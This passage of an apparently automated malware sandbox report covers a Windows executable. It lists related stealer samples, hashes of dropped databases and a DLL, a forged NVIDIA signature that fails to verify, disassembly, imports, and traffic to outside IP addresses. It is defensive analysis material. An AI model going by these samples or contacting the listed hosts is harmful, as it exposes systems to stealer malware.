                        bank details.exeGet hashmaliciousAgentTeslaBrowse
                        • 144.76.243.60
                        Correo postal 349892230.xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        • 188.40.116.241
                        REMITTANCE SLIP.exeGet hashmaliciousFormBookBrowse
                        • 178.63.50.103
                        https://gegraph.software.informer.com/download/?cf1ef3c9Get hashmaliciousUnknownBrowse
                        • 116.203.157.106
                        hmwBElsQoPfbj1u.exeGet hashmaliciousFormBookBrowse
                        • 135.181.212.206
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19Update.jsGet hashmaliciousSocGholishBrowse
                        • 149.154.167.99
                        Update.jsGet hashmaliciousSocGholishBrowse
                        • 149.154.167.99
                        STARBURN.DLL.dllGet hashmaliciousUnknownBrowse
                        • 149.154.167.99
                        STARBURN.DLL.dllGet hashmaliciousUnknownBrowse
                        • 149.154.167.99
                        NF_e_07_2024_XML__.msiGet hashmaliciousUnknownBrowse
                        • 149.154.167.99
                        Payment slip.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 149.154.167.99
                        Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 149.154.167.99
                        PO & Company profile.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                        • 149.154.167.99
                        PYT W2471234-MLIG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 149.154.167.99
                        staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                        • 149.154.167.99
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dllUmMgwOUPt5.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                          KLRA3j95ax.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              Setup.exeGet hashmaliciousVidarBrowse
                                file.exeGet hashmaliciousVidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse
                                      Jxo0X2iMrd.exeGet hashmaliciousCryptOne, VidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          file.exeGet hashmaliciousVidarBrowse
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):155648
                                            Entropy (8bit):0.5407252242845243
                                            Encrypted:false
                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):159744
                                            Entropy (8bit):0.5394293526345721
                                            Encrypted:false
                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.8439810553697228
                                            Encrypted:false
                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):0.6732424250451717
                                            Encrypted:false
                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                            Category:dropped
                                            Size (bytes):106496
                                            Entropy (8bit):1.136413900497188
                                            Encrypted:false
                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                            MD5:429F49156428FD53EB06FC82088FD324
                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):40960
                                            Entropy (8bit):0.8553638852307782
                                            Encrypted:false
                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                            Category:dropped
                                            Size (bytes):51200
                                            Entropy (8bit):0.8746135976761988
                                            Encrypted:false
                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                            Category:modified
                                            Size (bytes):196608
                                            Entropy (8bit):1.121297215059106
                                            Encrypted:false
                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                            Malicious:false
                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                            Category:dropped
                                            Size (bytes):71954
                                            Entropy (8bit):7.996617769952133
                                            Encrypted:true
                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                            Malicious:false
                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):328
                                            Entropy (8bit):3.137989037915285
                                            Encrypted:false
                                            SSDEEP:6:kKPGT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:2qDnLNkPlE99SNxAhUe/3
                                            MD5:E113C02773BE81D3C280B225C06A3655
                                            SHA1:F01C16E165703E9F97C726AECF2CE956CAB2C3D9
                                            SHA-256:5D7D8A8AE4AFA4CC5872303C20186CC1DF574E75A323D9DD2AC9A6AD47AED049
                                            SHA-512:EDAD37963070E6E6BA6DF20075FB4DF28411911D4CAB10834DEA1A33DF7B8AAC5D8E3909323E97377D8CB1F04095476CC7675B73052C4C1CD4F0DC8A9F870440
                                            Malicious:false
                                            Preview:p...... ........V\VQ...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):2459136
                                            Entropy (8bit):6.052474106868353
                                            Encrypted:false
                                            SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                            MD5:90E744829865D57082A7F452EDC90DE5
                                            SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                            SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                            SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: UmMgwOUPt5.exe, Detection: malicious, Browse
                                            • Filename: KLRA3j95ax.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: Setup.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: Jxo0X2iMrd.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            • Filename: file.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.504017216084228
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:file.exe
                                            File size:442'408 bytes
                                            MD5:7dc8189f70cc34e18ea7af8fdeac4142
                                            SHA1:8cb698efdf5971e0805dd0f0fb0457315490c777
                                            SHA256:a3608a51db9df14c42f8c6e37ac49969de70b4be0862d82b5823c00aed395f9d
                                            SHA512:9bb17829724af371d383874b8ed4efe09f7f518fa131d68dd02ae0a149b0506f42b2694d7ec9a59b591b28fdcd620b68116e1170cd489b396d294126332e93ac
                                            SSDEEP:6144:+uvXVvZjkQbsWSHZhP2YQih4Qsc14gY8f4en6hZpG+es7SJnXZfGBTaDsj48bR4B:5vdkQbjcps2+8uhAs64TR47EO
                                            TLSH:9894E01275C08473EA6325324AF4D7B96A7DFC300EB2498FA3A51BBE4F342829721757
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............T...T...T[..U...T[..U#..T[..U...TJi.U...T[..U...T...T...TJi.U...TJi.U...T{j.U...T{j.T...T{j.U...TRich...T...............
                                            Icon Hash:00928e8e8686b000
                                            Entrypoint:0x409caa
                                            Entrypoint Section:.text
                                            Digitally signed:true
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x66630B74 [Fri Jun 7 13:30:28 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:c746ee5ba8a06ab7dd2d5d1c7f055c1e
                                            Signature Valid:false
                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                            Signature Validation Error:The digital signature of the object did not verify
                                            Error Number:-2146869232
                                            Not Before, Not After
                                            • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                            Subject Chain
                                            • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                            Version:3
                                            Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                            Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                            Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                            Serial:0997C56CAA59055394D9A9CDB8BEEB56
                                            Instruction
                                            call 00007F11211BEA47h
                                            jmp 00007F11211BE0F9h
                                            push ebp
                                            mov ebp, esp
                                            jmp 00007F11211BE28Fh
                                            push dword ptr [ebp+08h]
                                            call 00007F11211CA864h
                                            pop ecx
                                            test eax, eax
                                            je 00007F11211BE291h
                                            push dword ptr [ebp+08h]
                                            call 00007F11211C54F9h
                                            pop ecx
                                            test eax, eax
                                            je 00007F11211BE268h
                                            pop ebp
                                            ret
                                            cmp dword ptr [ebp+08h], FFFFFFFFh
                                            je 00007F11211B8AD2h
                                            jmp 00007F11211BED36h
                                            push ebp
                                            mov ebp, esp
                                            push dword ptr [ebp+08h]
                                            call 00007F11211BED48h
                                            pop ecx
                                            pop ebp
                                            ret
                                            jmp 00007F11211BED40h
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            movzx eax, word ptr [ecx+14h]
                                            lea edx, dword ptr [ecx+18h]
                                            add edx, eax
                                            movzx eax, word ptr [ecx+06h]
                                            imul esi, eax, 28h
                                            add esi, edx
                                            cmp edx, esi
                                            je 00007F11211BE29Bh
                                            mov ecx, dword ptr [ebp+0Ch]
                                            cmp ecx, dword ptr [edx+0Ch]
                                            jc 00007F11211BE28Ch
                                            mov eax, dword ptr [edx+08h]
                                            add eax, dword ptr [edx+0Ch]
                                            cmp ecx, eax
                                            jc 00007F11211BE28Eh
                                            add edx, 28h
                                            cmp edx, esi
                                            jne 00007F11211BE26Ch
                                            xor eax, eax
                                            pop esi
                                            pop ebp
                                            ret
                                            mov eax, edx
                                            jmp 00007F11211BE27Bh
                                            push esi
                                            call 00007F11211BECFBh
                                            test eax, eax
                                            je 00007F11211BE2A2h
                                            mov eax, dword ptr fs:[00000018h]
                                            mov esi, 004693ACh
                                            mov edx, dword ptr [eax+04h]
                                            jmp 00007F11211BE286h
                                            cmp edx, eax
                                            je 00007F11211BE292h
                                            xor eax, eax
                                            mov ecx, edx
                                            lock cmpxchg dword ptr [esi], ecx
                                            test eax, eax
                                            jne 00007F11211BE272h
                                            xor al, al
                                            pop esi
                                            ret
                                            mov al, 01h
                                            pop esi
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            cmp dword ptr [ebp+00h], 00000000h
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x31d640x3c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x1e0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x69a000x2628
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000x221c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x2f0780x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x2f0c00x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2efb80x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x270000x178.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x2595b0x25a00d03b1ac577e8310a65cfcca0d1b9b28cFalse0.5770543500830565data6.629946953103711IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x270000xb6380xb80083ce0a9da3b5383dcb7ae371d186047bFalse0.4192000679347826data4.874082709437768IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x330000x36ebc0x35e008c632b07301722aef05673ff6d2dbc3eFalse0.9738979118329466data7.979395809192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x6a0000x1e00x200ec748486ad40c4e6cd2019b55b71ef97False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x6b0000x221c0x2400f99ed12824f202033297dec3df069714False0.7098524305555556data6.4054305886337835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_MANIFEST0x6a0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                            DLLImport
                                            ADVAPI32.dllRegEnableReflectionKey, DeleteAce
                                            KERNEL32.dllWaitForSingleObjectEx, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, RaiseException, InitOnceBeginInitialize, InitOnceComplete, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, GetCurrentThreadId, WakeAllConditionVariable, SleepConditionVariableSRW, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, GetLastError, FreeLibraryWhenCallbackReturns, CreateThreadpoolWork, SubmitThreadpoolWork, CloseThreadpoolWork, GetModuleHandleExW, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, CloseHandle, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, CreateFileW, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jun 7, 2024 17:21:04.529378891 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:04.529469967 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:04.529561996 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:04.549695969 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:04.549732924 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.423832893 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.424055099 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.467292070 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.467319012 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.468219042 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.468286037 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.473617077 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.520513058 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.787926912 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.787965059 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.788023949 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.788059950 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.788080931 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.788081884 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.788081884 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.788178921 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.798670053 CEST49708443192.168.2.5149.154.167.99
                                            Jun 7, 2024 17:21:05.798715115 CEST44349708149.154.167.99192.168.2.5
                                            Jun 7, 2024 17:21:05.824611902 CEST497095432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:05.829792976 CEST543249709116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:05.830240965 CEST497095432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:05.830362082 CEST497095432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:05.835469961 CEST543249709116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:06.702445030 CEST543249709116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:06.702464104 CEST543249709116.202.190.18192.168.2.5
                                            Jun 7, 2024 17:21:06.702553988 CEST497095432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:07.904989958 CEST497095432192.168.2.5116.202.190.18
                                            Jun 7, 2024 17:21:07.909918070 CEST543249709116.202.190.18192.168.2.5
